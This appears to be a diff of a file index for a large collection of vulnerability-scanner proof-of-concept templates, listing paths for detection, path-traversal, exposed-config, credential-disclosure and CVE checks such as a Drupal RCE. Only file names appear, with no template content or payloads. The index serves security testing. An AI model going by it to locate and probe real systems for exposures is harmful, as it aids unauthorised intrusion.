+./poc/detect/worksites-detection-11385.yaml ./poc/detect/worksites-detection-11386.yaml -./poc/detect/worksites-detection.yaml ./poc/detect/workspaceone-uem-airwatch-dashboard-detect.yaml ./poc/detect/wowza-streaming-detect.yaml ./poc/detect/wp-admin-detect.yaml @@ -44227,12 +44245,12 @@ ./poc/detect/wuzhicms-detect-11653.yaml ./poc/detect/wuzhicms-detect-11654.yaml ./poc/detect/wuzhicms-detect-11655.yaml -./poc/detect/wuzhicms-detect.yaml ./poc/detect/xml-schema-detect-11691.yaml ./poc/detect/xml-schema-detect.yaml ./poc/detect/xxljob-admin-detect-11707.yaml ./poc/detect/xxljob-admin-detect.yaml ./poc/detect/yapi-detect-11719.yaml +./poc/detect/yapi-detect-11720.yaml ./poc/detect/yapi-detect-11721.yaml ./poc/detect/yapi-detect-11722.yaml ./poc/detect/yellowfin-bi-version-detect.yaml @@ -44242,13 +44260,13 @@ ./poc/detect/yzmcms-detect.yaml ./poc/detect/zabbix-version-detect.yaml ./poc/detect/zebra-printer-detect.yaml -./poc/detect/zentao-detect-11785.yaml ./poc/detect/zentao-detect-11786.yaml +./poc/detect/zentao-detect-11787.yaml ./poc/detect/zentao-detect.yaml ./poc/detect/zentral-detection.yaml ./poc/detect/zentral-detection.yml ./poc/detect/zm-system-log-detect-1.yaml -./poc/detect/zm-system-log-detect-11833.yaml +./poc/detect/zm-system-log-detect-11834.yaml ./poc/detect/zm-system-log-detect-2.yaml ./poc/detect/zm-system-log-detect.yaml ./poc/directory_listing/Apexis-IPCAM-directory-traversal.yaml @@ -44260,7 +44278,7 @@ ./poc/directory_listing/aero-cms-directory-traversal.yaml ./poc/directory_listing/apache-httpd-cve-2021-41773-path-traversal.yml ./poc/directory_listing/bitrix-path-traversal.yaml -./poc/directory_listing/carel-bacnet-gateway-traversal.yaml +./poc/directory_listing/carel-bacnet-gateway-traversal-858.yaml ./poc/directory_listing/carel-pcoweb-hvac-bacnet-gateway-directory-traversal.yaml ./poc/directory_listing/changjet-tplus-downloadproxy-traversal.yaml ./poc/directory_listing/citrix-cve-2019-19781-path-traversal.yml @@ -44268,7 +44286,6 @@ ./poc/directory_listing/custom-solr-path-traversal.yaml ./poc/directory_listing/digitalrebar-traversal-6996.yaml ./poc/directory_listing/digitalrebar-traversal-6997.yaml -./poc/directory_listing/digitalrebar-traversal.yaml ./poc/directory_listing/dir-traversal.yaml ./poc/directory_listing/directory-traversal.yaml ./poc/directory_listing/django-directory-traversal.yaml @@ -44280,9 +44297,11 @@ ./poc/directory_listing/ecology-filedownload-directory-traversal.yaml ./poc/directory_listing/ecology-filedownload-directory-traversal.yml ./poc/directory_listing/ecology-jqueryfiletree-directory-traversal.yaml +./poc/directory_listing/ecology-springframework-directory-traversal-7174.yaml ./poc/directory_listing/ecology-springframework-directory-traversal-7175.yaml ./poc/directory_listing/ecology-springframework-directory-traversal.yml ./poc/directory_listing/ecology-springframework-directoryTraversal.yaml +./poc/directory_listing/elfinder-path-traversal-7203.yaml ./poc/directory_listing/elfinder-path-traversal.yaml ./poc/directory_listing/erp-nc-directory-traversal-7245.yaml ./poc/directory_listing/erp-nc-directory-traversal-7246.yaml @@ -44292,13 +44311,13 @@ ./poc/directory_listing/finereport-directory-traversal.yml ./poc/directory_listing/finereport-path-traversal-1.yaml ./poc/directory_listing/finereport-path-traversal-2.yaml +./poc/directory_listing/finereport-path-traversal-7476.yaml ./poc/directory_listing/finereport-path-traversal-7477.yaml ./poc/directory_listing/finereport-path-traversal-7478.yaml -./poc/directory_listing/finereport-path-traversal.yaml ./poc/directory_listing/flir-path-traversal-7517.yaml ./poc/directory_listing/flir-path-traversal-7518.yaml +./poc/directory_listing/flir-path-traversal-7519.yaml ./poc/directory_listing/flir-path-traversal-7520.yaml -./poc/directory_listing/flir-path-traversal-7521.yaml ./poc/directory_listing/flir-path-traversal-7522.yaml ./poc/directory_listing/flir-path-traversal-7523.yaml ./poc/directory_listing/forked-daapd-path-traversal.yaml @@ -44318,19 +44337,19 @@ ./poc/directory_listing/natshell-path-traversal-9006.yaml ./poc/directory_listing/natshell-path-traversal-9007.yaml ./poc/directory_listing/natshell-path-traversal-9008.yaml +./poc/directory_listing/natshell-path-traversal.yaml ./poc/directory_listing/netmizer-log-management-data-directory-traversal.yaml ./poc/directory_listing/nexusdb-cve-2020-24571-path-traversal.yml ./poc/directory_listing/nginx-merge-slashes-path-traversal-1.yaml ./poc/directory_listing/nginx-merge-slashes-path-traversal-2.yaml ./poc/directory_listing/nginx-merge-slashes-path-traversal-3.yaml ./poc/directory_listing/nginx-merge-slashes-path-traversal-9104.yaml -./poc/directory_listing/nginx-merge-slashes-path-traversal.yaml +./poc/directory_listing/nginx-merge-slashes-path-traversal-9105.yaml ./poc/directory_listing/nginx_path_traversal.yaml ./poc/directory_listing/nuxt-path-traversal.yaml ./poc/directory_listing/oa-tongda-path-traversal-9175.yaml ./poc/directory_listing/oa-tongda-path-traversal-9176.yaml ./poc/directory_listing/oa-tongda-path-traversal-9177.yaml -./poc/directory_listing/oa-tongda-path-traversal-9179.yaml ./poc/directory_listing/oa-tongda-path-traversal.yaml ./poc/directory_listing/path-traversal-exposure.yaml ./poc/directory_listing/path-traversal.yaml @@ -44339,16 +44358,16 @@ ./poc/directory_listing/pmb-directory-traversal-9610.yaml ./poc/directory_listing/pmb-directory-traversal-9611.yaml ./poc/directory_listing/pmb-directory-traversal-9612.yaml -./poc/directory_listing/pmb-directory-traversal-9613.yaml ./poc/directory_listing/pmb-directory-traversal-9614.yaml -./poc/directory_listing/tpshop-directory-traversal-10821.yaml +./poc/directory_listing/pmb-directory-traversal.yaml +./poc/directory_listing/tpshop-directory-traversal-10822.yaml ./poc/directory_listing/tpshop-directory-traversal-10823.yaml ./poc/directory_listing/tpshop-directory-traversal.yml ./poc/directory_listing/weiphp-path-traversal.yaml ./poc/directory_listing/weiphp-path-traversal.yml +./poc/directory_listing/wooyun-path-traversal-11229.yaml ./poc/directory_listing/wooyun-path-traversal-11230.yaml ./poc/directory_listing/wooyun-path-traversal-11231.yaml -./poc/directory_listing/wooyun-path-traversal-11232.yaml ./poc/directory_listing/wooyun-path-traversal-11233.yaml ./poc/directory_listing/wordpress-duplicator-path-traversal.yaml ./poc/directory_listing/wp-duplicator-path-traversal.yaml @@ -44358,9 +44377,9 @@ ./poc/directory_listing/zeit-nodejs-cve-2020-5284-directory-traversal.yml ./poc/docker/Kubernetes-unauth.yaml ./poc/docker/amazon-docker-config-279.yaml -./poc/docker/amazon-docker-config-280.yaml -./poc/docker/amazon-docker-config-disclosure-278.yaml ./poc/docker/amazon-docker-config-disclosure.yaml +./poc/docker/amazon-docker-config.yaml +./poc/docker/aws-ecs-container-agent-tasks-640.yaml ./poc/docker/aws-ecs-container-agent-tasks-641.yaml ./poc/docker/aws-ecs-container-agent-tasks.yaml ./poc/docker/container-registry-exposure.yaml @@ -44378,6 +44397,7 @@ ./poc/docker/docker-compose-config-7.yaml ./poc/docker/docker-compose-config-7057.yaml ./poc/docker/docker-compose-config-7058.yaml +./poc/docker/docker-compose-config-7059.yaml ./poc/docker/docker-compose-config-7060.yaml ./poc/docker/docker-compose-config.yml ./poc/docker/docker-compose.debug.yml @@ -44400,7 +44420,7 @@ ./poc/docker/dockercfg-config-1.yaml ./poc/docker/dockercfg-config-2.yaml ./poc/docker/dockercfg-config-7055.yaml -./poc/docker/dockercfg-config.yaml +./poc/docker/dockercfg-config-7056.yaml ./poc/docker/dockercfg.yaml ./poc/docker/dockerfile-disclosure.yaml ./poc/docker/dockerfile-hidden-disclosure-1.yaml @@ -44420,34 +44440,31 @@ ./poc/docker/kubernetes-dashboard.yaml ./poc/docker/kubernetes-enterprise-manager-8527.yaml ./poc/docker/kubernetes-enterprise-manager-8528.yaml -./poc/docker/kubernetes-enterprise-manager-8530.yaml +./poc/docker/kubernetes-enterprise-manager-8529.yaml ./poc/docker/kubernetes-enterprise-manager.yaml ./poc/docker/kubernetes-etcd-keys.yaml ./poc/docker/kubernetes-fake-certificate.yaml ./poc/docker/kubernetes-kustomization-disclosure-8531.yaml ./poc/docker/kubernetes-kustomization-disclosure-8532.yaml -./poc/docker/kubernetes-kustomization-disclosure-8533.yaml ./poc/docker/kubernetes-metrics-8534.yaml ./poc/docker/kubernetes-metrics-8535.yaml ./poc/docker/kubernetes-metrics-8536.yaml -./poc/docker/kubernetes-metrics.yaml ./poc/docker/kubernetes-mirantis-8537.yaml -./poc/docker/kubernetes-mirantis-8538.yaml ./poc/docker/kubernetes-mirantis-8539.yaml ./poc/docker/kubernetes-mirantis-8540.yaml ./poc/docker/kubernetes-mirantis-8541.yaml ./poc/docker/kubernetes-mirantis.yaml ./poc/docker/kubernetes-pods-1.yaml ./poc/docker/kubernetes-pods-2.yaml +./poc/docker/kubernetes-pods-8542.yaml ./poc/docker/kubernetes-pods-8543.yaml ./poc/docker/kubernetes-pods-8544.yaml -./poc/docker/kubernetes-pods-8546.yaml ./poc/docker/kubernetes-pods-api.yaml ./poc/docker/kubernetes-pods.yaml ./poc/docker/kubernetes-resource-report-8548.yaml ./poc/docker/kubernetes-resource-report-8549.yaml ./poc/docker/kubernetes-resource-report.yaml -./poc/docker/kubernetes-unauth(1).yaml +./poc/docker/kubernetes-unauth.yaml ./poc/docker/kubernetes-unauth.yml ./poc/docker/kubernetes-version-8550.yaml ./poc/docker/kubernetes-version-8551.yaml @@ -44463,8 +44480,8 @@ ./poc/drupal/drupal-cve-2018-7600-rce.yml ./poc/drupal/drupal-cve-2019-6340.yml ./poc/drupal/drupal-full-path-disclosure.yaml +./poc/drupal/drupal-install-7105.yaml ./poc/drupal/drupal-install-7106.yaml -./poc/drupal/drupal-install-7107.yaml ./poc/drupal/drupal-install-7108.yaml ./poc/drupal/drupal-install.yaml ./poc/drupal/drupal-login.yaml @@ -44473,15 +44490,16 @@ ./poc/drupal/drupal-user-enum-ajax-2.yaml ./poc/drupal/drupal-user-enum-ajax-3.yaml ./poc/drupal/drupal-user-enum-ajax-4.yaml +./poc/drupal/drupal-user-enum-ajax-7109.yaml +./poc/drupal/drupal-user-enum-ajax-7110.yaml ./poc/drupal/drupal-user-enum-ajax-7111.yaml -./poc/drupal/drupal-user-enum-ajax.yaml ./poc/drupal/drupal-user-enum-redirect-1.yaml ./poc/drupal/drupal-user-enum-redirect-2.yaml ./poc/drupal/drupal-user-enum-redirect-3.yaml ./poc/drupal/drupal-user-enum-redirect-4.yaml ./poc/drupal/drupal-user-enum-redirect-7112.yaml ./poc/drupal/drupal-user-enum-redirect-7113.yaml -./poc/drupal/drupal-user-enum-redirect-7114.yaml +./poc/drupal/drupal-user-enum-redirect-7115.yaml ./poc/drupal/drupal-workflow.yaml ./poc/drupal/drupal.yaml ./poc/drupal/drupal_module-acl-arbitrary-php-code-execution.yaml @@ -44801,7 +44819,6 @@ ./poc/elk/elasticsearch-1.yaml ./poc/elk/elasticsearch-2.yaml ./poc/elk/elasticsearch-5-version.yaml -./poc/elk/elasticsearch-7193.yaml ./poc/elk/elasticsearch-7194.yaml ./poc/elk/elasticsearch-7195.yaml ./poc/elk/elasticsearch-7196.yaml @@ -44817,8 +44834,10 @@ ./poc/elk/elasticsearch-insecure-default-config.yaml ./poc/elk/elasticsearch-log4j.yaml ./poc/elk/elasticsearch-sql-client-detect-7189.yaml +./poc/elk/elasticsearch-sql-client-detect-7190.yaml ./poc/elk/elasticsearch-sql-client-detect-7191.yaml ./poc/elk/elasticsearch-sql-client-detect-7192.yaml +./poc/elk/elasticsearch-sql-client-detect.yaml ./poc/elk/elasticsearch-unauth.yaml ./poc/elk/elasticsearch-unauth.yml ./poc/elk/elasticsearch-unauthorized-access.yaml @@ -44836,6 +44855,7 @@ ./poc/elk/kibana-detect-3.yaml ./poc/elk/kibana-detect-8483.yaml ./poc/elk/kibana-detect.yaml +./poc/elk/kibana-panel-8485.yaml ./poc/elk/kibana-panel-8486.yaml ./poc/elk/kibana-panel-8487.yaml ./poc/elk/kibana-panel.yaml @@ -44878,37 +44898,36 @@ ./poc/exposed/Wordpress-setupconfig-InfoDisclosure.yaml ./poc/exposed/active-admin-exposure-39.yaml ./poc/exposed/active-admin-exposure-40.yaml -./poc/exposed/active-admin-exposure-41.yaml ./poc/exposed/active-admin-exposure-42.yaml +./poc/exposed/active-admin-exposure-43.yaml ./poc/exposed/active-admin-exposure.yaml ./poc/exposed/activemq-path-disclosure.yaml -./poc/exposed/adobe-connect-username-exposure-100.yaml -./poc/exposed/adobe-connect-username-exposure-101.yaml +./poc/exposed/adobe-connect-username-exposure-98.yaml ./poc/exposed/adobe-connect-username-exposure-99.yaml ./poc/exposed/adobe-connect-username-exposure.yaml ./poc/exposed/airflow-api-exposure.yaml ./poc/exposed/airflow-configuration-exposure-229.yaml -./poc/exposed/airflow-configuration-exposure-230.yaml +./poc/exposed/airflow-configuration-exposure.yaml ./poc/exposed/airflow-exposure.yaml ./poc/exposed/allied-telesis-exposure.yaml -./poc/exposed/amazon-docker-config-disclosure-278.yaml ./poc/exposed/amazon-docker-config-disclosure.yaml ./poc/exposed/amazon-sns-topic-disclosure-detect.yaml -./poc/exposed/ambari-exposure-291.yaml ./poc/exposed/ambari-exposure-292.yaml +./poc/exposed/ambari-exposure-293.yaml ./poc/exposed/ambari-exposure-294.yaml ./poc/exposed/ambari-exposure-295.yaml ./poc/exposed/ambari-exposure.yaml ./poc/exposed/ampache-update-exposure.yaml ./poc/exposed/android-debug-database-exposed-312.yaml ./poc/exposed/android-debug-database-exposed-313.yaml +./poc/exposed/android-debug-database-exposed-314.yaml ./poc/exposed/android-debug-database-exposed-315.yaml ./poc/exposed/android-debug-database-exposed.yaml ./poc/exposed/ansible-config-disclosure-325.yaml -./poc/exposed/ansible-config-disclosure.yaml +./poc/exposed/ansible-config-disclosure-326.yaml +./poc/exposed/ansible-tower-exposure-329.yaml ./poc/exposed/ansible-tower-exposure-330.yaml ./poc/exposed/ansible-tower-exposure-331.yaml -./poc/exposed/ansible-tower-exposure-332.yaml ./poc/exposed/ansible-tower-exposure.yaml ./poc/exposed/apache-access-log-exposure.yaml ./poc/exposed/apache-config-exposure.yaml @@ -44924,17 +44943,17 @@ ./poc/exposed/appspec-yml-disclosure-2.yaml ./poc/exposed/appspec-yml-disclosure-527.yaml ./poc/exposed/appspec-yml-disclosure-528.yaml +./poc/exposed/appspec-yml-disclosure-529.yaml ./poc/exposed/aspnetmvc-version-disclosure.yaml ./poc/exposed/atlassian-jira-info-disclosure.yaml ./poc/exposed/atom-sync-exposure.yaml ./poc/exposed/avtech-dvr-exposure-614.yaml ./poc/exposed/avtech-dvr-exposure-615.yaml -./poc/exposed/avtech-dvr-exposure-616.yaml +./poc/exposed/avtech-dvr-exposure-617.yaml ./poc/exposed/avtech-password-disclosure.yaml ./poc/exposed/axiom-digitalocean-key-exposure-665.yaml -./poc/exposed/axiom-digitalocean-key-exposure-666.yaml ./poc/exposed/axiom-digitalocean-key-exposure-667.yaml -./poc/exposed/axiom-digitalocean-key-exposure.yaml +./poc/exposed/axiom-digitalocean-key-exposure-668.yaml ./poc/exposed/azure-apim-secret-key-disclosure.yaml ./poc/exposed/azure-pipelines-config-disclosure.yaml ./poc/exposed/azure-pipelines-exposed.yaml @@ -44942,23 +44961,25 @@ ./poc/exposed/bash-history-exposure.yaml ./poc/exposed/beward-ipcamera-disclosure-713.yaml ./poc/exposed/beward-ipcamera-disclosure-714.yaml +./poc/exposed/beward-ipcamera-disclosure-715.yaml ./poc/exposed/beward-ipcamera-disclosure-716.yaml -./poc/exposed/beward-ipcamera-disclosure-717.yaml -./poc/exposed/beward-ipcamera-disclosure.yaml ./poc/exposed/bitly-secret-key-disclosure.yaml ./poc/exposed/bitrix-full-path-disclosure.yaml ./poc/exposed/broadcom-backupsettings-exposure.yaml ./poc/exposed/casbin-get-users-account-password-disclosure.yaml ./poc/exposed/caucho-resin-info-disclosure-1.yaml ./poc/exposed/caucho-resin-info-disclosure-2.yaml -./poc/exposed/caucho-resin-info-disclosure-872.yaml +./poc/exposed/caucho-resin-info-disclosure-871.yaml +./poc/exposed/caucho-resin-info-disclosure.yaml +./poc/exposed/cisco-meraki-exposure-944.yaml ./poc/exposed/cisco-meraki-exposure-945.yaml -./poc/exposed/cisco-meraki-exposure-946.yaml ./poc/exposed/cisco-meraki-exposure.yaml ./poc/exposed/cisco-smi-exposure-970.yaml +./poc/exposed/cisco-smi-exposure-971.yaml ./poc/exposed/cisco-smi-exposure-972.yaml ./poc/exposed/clockwork-dashboard-exposure-1012.yaml ./poc/exposed/clockwork-dashboard-exposure-1013.yaml +./poc/exposed/clockwork-dashboard-exposure-1014.yaml ./poc/exposed/clockwork-dashboard-exposure.yaml ./poc/exposed/cobbler-exposed-directories.yaml ./poc/exposed/commax-credentials-disclosure-1158.yaml @@ -44968,22 +44989,21 @@ ./poc/exposed/container-registry-exposure.yaml ./poc/exposed/coremail-config-disclosure-1213.yaml ./poc/exposed/coremail-config-disclosure-1214.yaml -./poc/exposed/coremail-config-disclosure-1215.yaml +./poc/exposed/coremail-config-disclosure-1216.yaml ./poc/exposed/coremail-config-disclosure.yaml -./poc/exposed/couchdb-exposure-1238.yaml +./poc/exposed/couchdb-exposure-1239.yaml ./poc/exposed/couchdb-exposure-1240.yaml ./poc/exposed/couchdb-exposure-1241.yaml ./poc/exposed/couchdb-exposure.yaml ./poc/exposed/credential-exposure-1249.yaml ./poc/exposed/credential-exposure-1250.yaml -./poc/exposed/credential-exposure-file.yaml ./poc/exposed/credential-exposure.yaml -./poc/exposed/credentials-disclosure-1252.yaml ./poc/exposed/credentials-disclosure-1253.yaml ./poc/exposed/credentials-disclosure-1254.yaml ./poc/exposed/credentials-disclosure-1255.yaml ./poc/exposed/credentials-disclosure-1256.yaml ./poc/exposed/credentials-disclosure-all.yaml +./poc/exposed/credentials-disclosure.yaml ./poc/exposed/dahua-passowrd-disclosure.yaml ./poc/exposed/dashboard-exposed.yaml ./poc/exposed/database.json-exposure.yaml @@ -45046,13 +45066,14 @@ ./poc/exposed/exposed-alps-spring-2.yaml ./poc/exposed/exposed-alps-spring-3.yaml ./poc/exposed/exposed-alps-spring-7283.yaml -./poc/exposed/exposed-alps-spring-7284.yaml +./poc/exposed/exposed-alps-spring-7285.yaml ./poc/exposed/exposed-alps-spring.yaml ./poc/exposed/exposed-api-env-variables.yaml ./poc/exposed/exposed-authentication-asmx-7286.yaml ./poc/exposed/exposed-authentication-asmx-7287.yaml ./poc/exposed/exposed-authentication-asmx-7288.yaml ./poc/exposed/exposed-authentication-asmx-7289.yaml +./poc/exposed/exposed-authentication-asmx.yaml ./poc/exposed/exposed-authentication.asmx.yaml ./poc/exposed/exposed-backup-files.yaml ./poc/exposed/exposed-bitkeeper-7290.yaml @@ -45080,24 +45101,19 @@ ./poc/exposed/exposed-gitignore-7302.yaml ./poc/exposed/exposed-gitignore-7303.yaml ./poc/exposed/exposed-gitignore-7304.yaml -./poc/exposed/exposed-gitignore-7305.yaml ./poc/exposed/exposed-gitignore-7306.yaml ./poc/exposed/exposed-gitlab-ci-config.yaml ./poc/exposed/exposed-gits.yaml ./poc/exposed/exposed-glances-api-7307.yaml -./poc/exposed/exposed-glances-api-7308.yaml -./poc/exposed/exposed-glances-api-7309.yaml ./poc/exposed/exposed-glances-api-7310.yaml ./poc/exposed/exposed-grafana.yaml ./poc/exposed/exposed-hg-7311.yaml -./poc/exposed/exposed-hg-7312.yaml ./poc/exposed/exposed-hg.yaml ./poc/exposed/exposed-jenkins.yaml ./poc/exposed/exposed-jira.yaml ./poc/exposed/exposed-jquery-file-upload-7313.yaml ./poc/exposed/exposed-jquery-file-upload-7314.yaml ./poc/exposed/exposed-jquery-file-upload-7315.yaml -./poc/exposed/exposed-jquery-file-upload.yaml ./poc/exposed/exposed-kafdrop-7316.yaml ./poc/exposed/exposed-kafdrop-7317.yaml ./poc/exposed/exposed-kafdrop-7318.yaml @@ -45112,28 +45128,26 @@ ./poc/exposed/exposed-mysql-initial-7322.yaml ./poc/exposed/exposed-mysql-initial-7323.yaml ./poc/exposed/exposed-mysql-initial-7324.yaml -./poc/exposed/exposed-mysql-initial.yaml ./poc/exposed/exposed-nomad-7325.yaml ./poc/exposed/exposed-nomad-7326.yaml ./poc/exposed/exposed-nomad-7327.yaml ./poc/exposed/exposed-nomad-7328.yaml -./poc/exposed/exposed-nomad-7329.yaml ./poc/exposed/exposed-nomad.yaml ./poc/exposed/exposed-pagespeed-global-admin-7331.yaml ./poc/exposed/exposed-pagespeed-global-admin.yaml ./poc/exposed/exposed-phpmyadmin.yaml ./poc/exposed/exposed-pii.yaml ./poc/exposed/exposed-prometheus-log-7332.yaml +./poc/exposed/exposed-prometheus-log-7333.yaml ./poc/exposed/exposed-prometheus-log.yaml ./poc/exposed/exposed-redis-7335.yaml -./poc/exposed/exposed-redis-7336.yaml ./poc/exposed/exposed-redis-7337.yaml ./poc/exposed/exposed-redis-7338.yaml ./poc/exposed/exposed-redis-7339.yaml ./poc/exposed/exposed-redis.yaml ./poc/exposed/exposed-service-now-7340.yaml ./poc/exposed/exposed-service-now-7341.yaml -./poc/exposed/exposed-service-now-7342.yaml +./poc/exposed/exposed-service-now-7343.yaml ./poc/exposed/exposed-service-now.yaml ./poc/exposed/exposed-sharepoint-list-7344.yaml ./poc/exposed/exposed-sharepoint-list-7345.yaml @@ -45145,7 +45159,7 @@ ./poc/exposed/exposed-sqlite-manager-7350.yaml ./poc/exposed/exposed-sqlite-manager.yaml ./poc/exposed/exposed-struts.yaml -./poc/exposed/exposed-svn-7352.yaml +./poc/exposed/exposed-svn-7351.yaml ./poc/exposed/exposed-svn-7353.yaml ./poc/exposed/exposed-svn-7354.yaml ./poc/exposed/exposed-svn-7355.yaml @@ -45162,7 +45176,6 @@ ./poc/exposed/exposed-zookeeper-7363.yaml ./poc/exposed/exposed-zookeeper-7364.yaml ./poc/exposed/exposed-zookeeper-7365.yaml -./poc/exposed/exposed-zookeeper.yaml ./poc/exposed/fanruanoa2012-disclosure-1.yaml ./poc/exposed/fanruanoa2012-disclosure-2.yaml ./poc/exposed/fanruanoa2012-disclosure-7389.yaml @@ -45171,15 +45184,16 @@ ./poc/exposed/filezilla-exposed.yaml ./poc/exposed/firebase-config-exposure-1.yaml ./poc/exposed/firebase-config-exposure-2.yaml -./poc/exposed/firebase-config-exposure-7485.yaml ./poc/exposed/firebase-config-exposure-7486.yaml +./poc/exposed/firebase-config-exposure-7487.yaml ./poc/exposed/firebase-config-exposure-7488.yaml +./poc/exposed/firebase-config-exposure.yaml ./poc/exposed/firebase-messaging-sw-js-exposure.yaml +./poc/exposed/flink-exposure-7509.yaml ./poc/exposed/flink-exposure-7510.yaml -./poc/exposed/flink-exposure-7511.yaml ./poc/exposed/flink-exposure.yaml ./poc/exposed/ftp-credentials-exposure-7567.yaml -./poc/exposed/ftp-credentials-exposure-7568.yaml +./poc/exposed/ftp-credentials-exposure.yaml ./poc/exposed/get-case-insensitive.yaml ./poc/exposed/git-config-exposure.yaml ./poc/exposed/git-credentials-disclosure-7639.yaml @@ -45207,7 +45221,7 @@ ./poc/exposed/github-workflows-disclosure-5.yaml ./poc/exposed/github-workflows-disclosure-6.yaml ./poc/exposed/github-workflows-disclosure-7.yaml -./poc/exposed/github-workflows-disclosure-7664.yaml +./poc/exposed/github-workflows-disclosure-7665.yaml ./poc/exposed/github-workflows-disclosure-7666.yaml ./poc/exposed/github-workflows-disclosure-8.yaml ./poc/exposed/github-workflows-disclosure-9.yaml @@ -45222,7 +45236,6 @@ ./poc/exposed/glpi-telemetry-disclosure.yaml ./poc/exposed/go-mod-disclosure.yaml ./poc/exposed/go-pprof-exposed.yaml -./poc/exposed/gogs-install-exposure-7755.yaml ./poc/exposed/gogs-install-exposure-7757.yaml ./poc/exposed/gogs-install-exposure-7758.yaml ./poc/exposed/gogs-install-exposure.yaml @@ -45246,6 +45259,7 @@ ./poc/exposed/hp-ilo-serial-key-disclosure-8022.yaml ./poc/exposed/hp-ilo-serial-key-disclosure-8023.yaml ./poc/exposed/hp-ilo-serial-key-disclosure-8024.yaml +./poc/exposed/hp-ilo-serial-key-disclosure-8025.yaml ./poc/exposed/ibm-friendly-path-exposure-1.yaml ./poc/exposed/ibm-friendly-path-exposure-2.yaml ./poc/exposed/ibm-friendly-path-exposure-3.yaml @@ -45264,34 +45278,35 @@ ./poc/exposed/iceflow-vpn-disclosure-6.yaml ./poc/exposed/iceflow-vpn-disclosure-7.yaml ./poc/exposed/iceflow-vpn-disclosure-8.yaml +./poc/exposed/iceflow-vpn-disclosure-8127.yaml ./poc/exposed/iceflow-vpn-disclosure-8128.yaml ./poc/exposed/iceflow-vpn-disclosure.yaml ./poc/exposed/idea-folder-exposure-1.yaml ./poc/exposed/idea-folder-exposure-2.yaml ./poc/exposed/idea-logs-exposure-1.yaml ./poc/exposed/idea-logs-exposure-2.yaml -./poc/exposed/iis-internal-ip-disclosure-8149.yaml ./poc/exposed/iis-internal-ip-disclosure.yaml ./poc/exposed/information-disclosure-in-js-files.yaml ./poc/exposed/internal-ip-disclosure.yaml ./poc/exposed/iotawatt-app-exposure-8186.yaml -./poc/exposed/iotawatt-app-exposure.yaml +./poc/exposed/iotawatt-app-exposure-8187.yaml ./poc/exposed/java-melody-exposed-1.yaml ./poc/exposed/java-melody-exposed-2.yaml ./poc/exposed/java-melody-exposed-8221.yaml ./poc/exposed/java-melody-exposed-8222.yaml +./poc/exposed/java-melody-exposed-8223.yaml ./poc/exposed/java-melody-exposed-8224.yaml ./poc/exposed/jenkins-credentials-disclosure.yml ./poc/exposed/jenkins-exposed.yaml ./poc/exposed/jenkins-home-dir-exposure.yaml ./poc/exposed/jetty-information-disclosure.yaml +./poc/exposed/jfrog-unauth-build-exposed-8299.yaml ./poc/exposed/jfrog-unauth-build-exposed-8300.yaml ./poc/exposed/jfrog-unauth-build-exposed-8301.yaml -./poc/exposed/jfrog-unauth-build-exposed-8302.yaml ./poc/exposed/jfrog-unauth-build-exposed.yaml ./poc/exposed/jiva-admin-exposure.yaml ./poc/exposed/jolokia-heap-info-disclosure-8357.yaml -./poc/exposed/jolokia-info-disclosure-8358.yaml +./poc/exposed/jolokia-info-disclosure-8359.yaml ./poc/exposed/jolokia-info-disclosure.yaml ./poc/exposed/joomla-sensitive-config.yaml ./poc/exposed/jupyter-notebooks-exposed.yaml @@ -45300,9 +45315,9 @@ ./poc/exposed/kronos-wsld-exposure.yaml ./poc/exposed/kubernetes-kustomization-disclosure-8531.yaml ./poc/exposed/kubernetes-kustomization-disclosure-8532.yaml -./poc/exposed/kubernetes-kustomization-disclosure-8533.yaml ./poc/exposed/kyan-credential-exposure-8554.yaml ./poc/exposed/kyan-credential-exposure.yaml +./poc/exposed/kyan-network-credentials-disclosure-8556.yaml ./poc/exposed/kyan-network-credentials-disclosure.yaml ./poc/exposed/laravel-env-disclosure.yaml ./poc/exposed/laravel-telescope-exposed.yaml @@ -45313,20 +45328,20 @@ ./poc/exposed/logstash-config-exposure.yml ./poc/exposed/lvmeng-uts-disclosure-8679.yaml ./poc/exposed/lvmeng-uts-disclosure-8680.yaml +./poc/exposed/lvmeng-uts-disclosure-8681.yaml ./poc/exposed/magento-2-exposed-api-1.yaml ./poc/exposed/magento-2-exposed-api-2.yaml ./poc/exposed/magento-2-exposed-api-3.yaml ./poc/exposed/magento-2-exposed-api-8687.yaml ./poc/exposed/magento-2-exposed-api-8688.yaml ./poc/exposed/magento-2-exposed-api-8689.yaml -./poc/exposed/magento-config-disclosure.yaml ./poc/exposed/magento-information-disclosure.yaml ./poc/exposed/mapbox-token-disclosure.yaml ./poc/exposed/mobsf-framework-exposure.yaml -./poc/exposed/monitorix-exposure-8929.yaml ./poc/exposed/monitorix-exposure-8930.yaml ./poc/exposed/monitorix-exposure-8931.yaml ./poc/exposed/monitorix-exposure-8932.yaml +./poc/exposed/monitorix-exposure-8933.yaml ./poc/exposed/monitorix-exposure.yaml ./poc/exposed/mysql-my-cnf-disclosure.yaml ./poc/exposed/netgear-router-disclosure.yaml @@ -45342,7 +45357,7 @@ ./poc/exposed/opcache-status-exposure-2.yaml ./poc/exposed/opcache-status-exposure-3.yaml ./poc/exposed/opcache-status-exposure-9254.yaml -./poc/exposed/openbmcs-secret-disclosure.yaml +./poc/exposed/openbmcs-secret-disclosure-9260.yaml ./poc/exposed/openfire-credentials-exposure.yaml ./poc/exposed/openssh-sshd-config-disclosure.yaml ./poc/exposed/opentext-livesite-teamsite-database-info-exposure.yaml @@ -45353,7 +45368,6 @@ ./poc/exposed/oracle-ebs-sqllog-disclosure-9367.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9369.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9370.yaml -./poc/exposed/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9372.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure.yaml ./poc/exposed/ovpn-file-disclosure.yaml @@ -45361,7 +45375,7 @@ ./poc/exposed/path-traversal-exposure.yaml ./poc/exposed/pgadmin-exposure-9488.yaml ./poc/exposed/pgadmin-exposure-9489.yaml -./poc/exposed/pgadmin-exposure-9490.yaml +./poc/exposed/pgadmin-exposure-9491.yaml ./poc/exposed/pgadmin-exposure.yaml ./poc/exposed/php-debugbar-exposure.yaml ./poc/exposed/php-user-ini-disclosure-1.yaml @@ -45391,11 +45405,12 @@ ./poc/exposed/proton-recovery-phrase-disclosure.yaml ./poc/exposed/putty-private-key-disclosure-9729.yaml ./poc/exposed/putty-private-key-disclosure-9730.yaml -./poc/exposed/putty-private-key-disclosure-9732.yaml +./poc/exposed/putty-private-key-disclosure-9731.yaml 